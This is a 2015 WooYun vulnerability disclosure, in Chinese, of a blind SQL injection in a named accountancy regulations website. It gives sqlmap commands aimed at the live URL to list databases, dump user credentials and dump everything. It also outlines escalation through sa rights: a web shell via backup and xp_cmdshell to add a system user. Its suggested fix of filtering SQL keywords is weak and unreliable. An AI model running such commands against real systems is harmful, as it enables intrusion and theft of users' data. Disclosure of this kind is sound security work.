当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118648

漏洞标题:注册会计师行业法律法规库网站存在SQL延时盲注漏洞一枚

相关厂商:cncert国家互联网应急中心

漏洞作者: wy007

提交时间:2015-06-09 11:29

修复时间:2015-07-27 18:28

公开时间:2015-07-27 18:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

注册会计师行业法律法规库网站存在SQL延时盲注一枚可获得用户注册信息等敏感信息,SA权限可执行数据库命令,可脱裤。

详细说明:

注册会计师行业法律法规库网站:http://cicpa.wkinfo.com.cn
注入里最难搞的延时+盲注都让我碰到了...说实话对这种注入最没耐心了,实在太慢,要不是为了能搞到一个乌云码,直接就放弃掉了......
下面进入正题...
看到是盲注类型的,直接丢进SQLMap...
SQLMap注入语句:

第一条:获取所有数据库名:
sqlmap.py -u "http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh'" --dbms=mssql --dbs


第二条:获取网站当前数据库的所有表名:
sqlmap.py -u "http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh'" --dbms=mssql -D bold_cicpa --table


获取用户表下的所有数据:(包含注册信息和登录用户名和密码)
sqlmap.py -u "http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh'" --dbms=mssql -D bold_cicpa -T bold_users --dump


获取表的字段信息:
sqlmap.py -u "http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh'" --dbms=mssql -D bold_cicpa -T bold_users --columns


获取表里的字段数据:
sqlmap.py -u "http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh'" --dbms=mssql -D bold_cicpa -T bold_users -C username,password --dump


最后一招必杀技:脱裤!:(这里申明一下...这么猥琐的事情,本人是不会干的...)
sqlmap.py -u "http://cicpa.wkinfo.com.cn/search/process?collection=D9SbE9mh'" --dbms=mssql -D bold_cicpa --dump-all


漏洞证明:

SQLMap开始暴库:

1.jpg


当前所有库名:

3.jpg


当前数据库用户名:(sa)

9.jpg


当前用户权限:(DBA权限)

4.jpg


所有数据库用户及权限信息:

11.png


当前网站数据库:

5.jpg


所有数据库用户及Hash密码:

7.jpg


8.jpg


主机名称和MSSQL版本信息:

18.jpg


sql-shell模式下执行SQL查询命令:(查询用户注册信息,含登录用户名和密码)

19.jpg


数据太多,查询太慢...... so,只查询了一条,相信一条也足以说明问题了。。
盲注查询实在太慢,其他数据就不一一列举了...
SA权限,其实可以考虑继续通过sa权限提权的...(差异备份写入一句话拿shell,通过xp_cmdshell执行系统命令添加系统用户开远端直接拿服务器等等)
提权这里只说一个思路就不继续下去了...
因为在搞下去实在太慢,而且对这个网站兴趣不大,所以就pass了...
这个站本来就是无意发现的,从主站旁站搞过来的,没想到搞到了这里...
辛苦挖洞只为获得一个邀请码啊...辛酸ing...
PS:之前找了几个反射性跨站漏洞和SQL注入,来这里提交想换得一枚邀请码,结果几次都杯具了...
后来明白了。。。原来不仅要漏洞,而且还要是大公司有影响力的漏洞才可以哇。。。
怪不得,读书少,就是各种坑啊...
也不知道这次找的这个公司啥背景,上帝保佑我能通过吧!阿门..

修复方案:

过滤
select
from
and
or
等字符

版权声明:转载请注明来源 wy007@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-06-12 18:26

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无